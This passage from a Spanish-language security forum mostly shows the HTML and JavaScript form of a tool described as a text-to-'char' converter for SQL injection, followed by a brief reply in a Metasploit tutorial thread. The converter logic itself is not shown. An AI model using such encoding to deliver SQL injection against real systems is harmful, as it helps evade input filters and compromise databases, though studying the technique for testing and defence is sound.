background-color: #000;
}
</style>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></head>
<body topmargin="0" marginheight="0"><center>
<p></p>
<p><b> Convertidor de texto a "char" orientado a inyecciones SQL.</b><br></p>
<table width="600" border="0" bgcolor="orange" cellpadding="15" cellspacing="0">
<tr>
<td>
<table width="570" border="0" bgcolor="#0F0" cellpadding="10" cellspacing="0">
<tr>
<td class='ta'><br>
<script language="JavaScript"><!--
document.write("<form name='convertirformulario'>");
if(browsertype == "NN4x"){
document.write("<b>Escriba el texto en el siguiente cuadro:</br><textarea class='ta' cols='50' rows='6' name='texto' wrap='virtual'></textarea>");
}else{
document.write("<b>Escriba el texto en el siguiente cuadro:<textarea class='ta' cols='105' rows='6' name='texto' wrap='virtual'></textarea>");
}
document.write("<br>\n");
document.write("<br><center><b>Este convertidor no funcionará con etiquetas o códigos de lenguajes de programación.</b></center><br>\n");
document.write("<center><input type='button' value='Convertir' onclick='preguntame();'> <input type='button' value='Ejemplo' onclick='ejemplo1();'> <input type='button' value='Limpiar cuadro' onclick='limpiame();'></center>");
document.write("<br>\n");
if(browsertype == "NN4x"){
document.write("<b>El texto convertido aparecerá aquí:<textarea class='ta' cols='50' rows='6' name='ascii' wrap='virtual'></textarea>");
}else{
document.write("<b>El texto convertido aparecerá aquí:<textarea class='ta' cols='105' rows='6' name='ascii' wrap='virtual'></textarea>");
}
document.write("</form>\n");
document.write("<br><center><b>-- HYPERNETHOST & SECURITY-PENTEST --</b></center><br>\n");
//-->
</script></td></tr></table>
</td></tr></table>
</body>
</html>Espero te sirva de algo los ejemplos.
Saludos!.
#80
Cursos, manuales y libros / Re:[Descarga] Tutorial Metasploit Recomendado
Junio 17, 2012, 04:07:15 AM
Tiene pinta de ser un texto para presentación de alguna charla.
